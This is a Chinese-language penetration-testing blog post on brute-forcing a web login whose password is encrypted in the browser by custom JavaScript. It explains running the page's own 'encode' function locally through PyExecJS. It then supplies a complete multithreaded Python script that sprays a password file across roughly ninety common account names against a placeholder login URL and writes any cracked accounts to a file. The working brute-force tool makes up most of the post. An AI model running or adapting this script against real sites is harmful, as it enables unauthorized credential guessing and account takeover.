在滲透的過程中，有時候會遇到密碼在前端加密了，為我們爆破提高了難度。加密是js指令碼自定義函式加密，burp裡面的一些加密函式就滿足不了我們的需求。如下所示，密碼為admin123，加密的效果如下：

可以看到加密的函式主要是encode，所以每個密碼都由自定義函式加密。

最近在實戰過程中get到一個new trick，利用相應的工具或者模組執行該 js 檔案，拿到輸出結果即可，可以使用 python 自帶的execjs。

安裝

先安裝 execjs
pip install PyExecJS

將js程式碼儲存在本地。

#coding:utf-8
 

from selenium import webdriver
import  execjs

with open ('test.js','r') as jj:
    source = jj.read()
    phantom = execjs.get('PhantomJS')
    getpass = phantom.compile(source)
    mypass = getpass.call('encrypt', 'admin','admin123')
    print mypass

利用以上程式碼可獲得相應的密碼。

爆破

自動化走起，寫了一個python指令碼進行滲透爆破。

#coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import requests
import re
import base64
import time
import random
import threading
from selenium import webdriver
import  execjs

def brute(user,password,UA):
        url = 'http://xxx/login'
        with open('test.js', 'r') as jj:
            source = jj.read()
            # phantom = execjs.get('PhantomJS')
 

            phantom = execjs.get()
            getpass = phantom.compile(source)
            print user, password
            mypass = getpass.call('encode', user, password)
            passwd = mypass
            print passwd
        post_data = {}
        post_data['userName'] = user
        post_data['userPass'] = passwd
        post_data['verifyCode'] = 'dsvx'
        headers ={
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "http://xxx/",
        "Connection": "close"}
        resp = requests.post(url=url,data=post_data,headers=headers)
        print user+"#"+password+" "+resp.content
        if not resp.content.find(u'請檢查賬號和密碼') > 0 :
            print '*** find user:', user, 'with password:', password, '***'
            with open('accounts-cracked.txt', 'a+') as f:
                f.write(user + '    ' +  passwd + '\n')



def main():
    tsk = []
    user_list = ['admin','noreply','hr','jobs','qiniu','lietou','demo','ceo','dev','root','service','fuwu','yunying','webmaster','wechat','weixin','weibo','tec','bd','bf','op','shop','test','pm','kefu','cdn','marketing','zhaopin','suggestion','warning','risk','system','pay','payment','management','feedback','guanli','ci','ad','td','news','cert','sdk','pmd','appstore','development','it','fankui','notify','bugs','security','sec','alipay','yunwei','message','support','ceshi','developer','notice','redmine','alert','kaifa','seo','git','vpn','jenkins','jira','zabbix','chandao','nagios','monitor','account','jubao','backup','open','openapi','github','reload','blacklist','buyer','caiwu','order','postmaster','pr','report','public','download','som','ops','devops','caigou','pmp','monit']
    f1 = open('pass2.txt','r')
    for i in f1.readlines():
        password = i.strip()
        for j in user_list:
            user = j
            UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"
            t = threading.Thread(target = brute,args = (user,password,UA))
            tsk.append(t)
    for t in tsk:
        t.start()
        t.join()#阻塞(0.1)


if __name__ == '__main__':
    main()

效果圖：

參考：
https://segmentfault.com/a/1190000010179232